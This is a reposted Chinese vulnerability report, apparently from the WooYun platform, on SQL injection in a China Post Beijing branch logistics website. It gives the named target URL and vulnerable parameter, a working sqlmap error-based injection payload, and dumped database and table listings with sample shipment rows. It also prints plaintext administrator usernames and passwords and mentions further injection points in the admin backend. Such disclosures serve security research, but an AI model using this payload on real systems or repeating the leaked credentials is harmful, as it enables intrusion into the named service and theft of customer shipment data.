神刀安全网

漏洞标题: 中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

2016-05-25 分类:安全漏洞 评论(0)

漏洞详情

披露状态:

2016-04-09: 细节已通知厂商并且等待厂商处理中
2016-04-09: 厂商已经确认,细节仅向厂商公开
2016-04-19: 细节向核心白帽子及相关领域专家公开
2016-04-29: 细节向普通白帽子公开
2016-05-09: 细节向实习白帽子公开
2016-05-24: 细节向公众公开

简要描述:

多个地方SQL注入

详细说明:

code 区域 
http://www.bj-cnpl.com

中 国 邮 政 速 递 物 流 股 份 有 限 公 司 北 京 市 分 公 司

系统多处存在SQL注入,泄露一些运单信息

code 区域 
http://www.bj-cnpl.com/showstate.asp?orderno=CI065580410JP*&x=38&y=1

漏洞标题: 中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

orderno存在SQL注入

code 区域 
current user:    'cnpluser'

code 区域 
Parameter: #1* (URI)
     Type: error-based
     Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
     Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1
 ---
 web server operating system: Windows 2003 or XP
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP
 back-end DBMS: Microsoft SQL Server 2005
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: #1* (URI)
     Type: error-based
     Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
     Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1
 ---
 web server operating system: Windows 2003 or XP
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP
 back-end DBMS: Microsoft SQL Server 2005
 available databases [6]:
 [*] AT
 [*] ATRACK
 [*] master
 [*] model
 [*] msdb
 [*] tempdb

code 区域 
Database: ATRACK
 [19 tables]
 +---------------------+
 | CNPL_DNJ_REDOC      |
 | Logistic_DNJ        |
 | Logistic_POD_Status |
 | Logistic_Russia     |
 | Logistic_Shipment   |
 | Logistic_State      |
 | Logistic_Upload_D   |
 | Logistic_Upload_I   |
 | Logistic_Upload_M   |
 | Logistic_User       |
 | MAN_DT              |
 | MAN_HD              |
 | atrackdssw21        |
 | atrackdssw22        |
 | atrackdssw23        |
 | atrackdssw24        |
 | atrackdssw25        |
 | sysdiagrams         |
 | 中邮与俄方状态对照表|
 +---------------------+

code 区域 
Database: ATRACK
 +-------------------------+---------+
 | Table                   | Entries |
 +-------------------------+---------+
 | dbo.Logistic_State      | 1641873 |转运信息
 | dbo.CNPL_DNJ_REDOC      | 348257  |
 | dbo.Logistic_Upload_I   | 1259    |
 | dbo.Logistic_Upload_M   | 1237    |
 | dbo.Logistic_Shipment   | 941     |
 | dbo.Logistic_POD_Status | 47      |
 | dbo.Logistic_Russia     | 23      |
 | dbo.MAN_DT              | 17      |
 | dbo.Logistic_User       | 11      |
 | dbo.Logistic_Upload_D   | 6       |
 | dbo.MAN_HD              | 6       |
 | dbo.Logistic_DNJ        | 1       |
 +-------------------------+---------+

code 区域 
Table: Logistic_State
 [3 entries]
 +-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
 | Logistic_State_ID | Logistic_State_No | Logistic_State_DT  | Logistic_State_Eng              | Logistic_State_Chn | Logistic_State_OPS | Logistic_State_Memo             | Logistic_State_City | Logistic_State_Time | Logistic_State_Sign | Logistic_State_Code_Problem | Logistic_State_Code_PINumber |
 +-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
 | 10000             | BPIL870050205     | 11 20 2012  1:18PM | Arrived on an airport warehouse | 到达机场监管中心           | admin              | Arrived on an airport warehouse | Moscow, Russia      | 11 10 2012  3:00PM  | <blank>             | <blank>                     | STA  56                      |
 | 100000            | CT287578855CN     | 02 27 2014  9:06AM | Shipment Out of Delivery        | 快件外出派送             | admin              | <blank>                         | CANADA              | 02 26 2014 12:19PM  | <blank>             | <blank>                     | SH003                        |
 | 1000000           | 98723A925         | 09 22 2015  8:25AM | Shipment forwarded              | 快件转运               | admin              | <blank>                         | 东莞                  | 09 22 2015  6:57AM  | <blank>             | <blank>                     | SH272                        |
 +-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+

漏洞证明:

用户密码什么的没有加密

code 区域 
+------------------+--------------------+---------------------+-----------------------+------------------------+
 | Logistic_User_ID | Logistic_User_Name | Logistic_User_Power | Logistic_User_Enabled | Logistic_User_Password |
 +------------------+--------------------+---------------------+-----------------------+------------------------+
 | 1                | admin              | ADMIN               | YES                   | lzyouzheng             |
 | 10               | emskf              | ADMIN               | YES                   | kefuzhongxin           |
 | 11               | guoji              | ADMIN               | YES                   | guojifengongsi         |
 +------------------+--------------------+---------------------+-----------------------+------------------------+

登陆后台,发现后台又有SQL注入

新添加状态,填入“'”

漏洞标题: 中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

漏洞标题: 中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

漏洞标题: 中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

另外两处

漏洞标题: 中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

漏洞标题: 中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

修复方案:

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

分享到:更多 ()

相关推荐

评论 抢沙发

取消

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址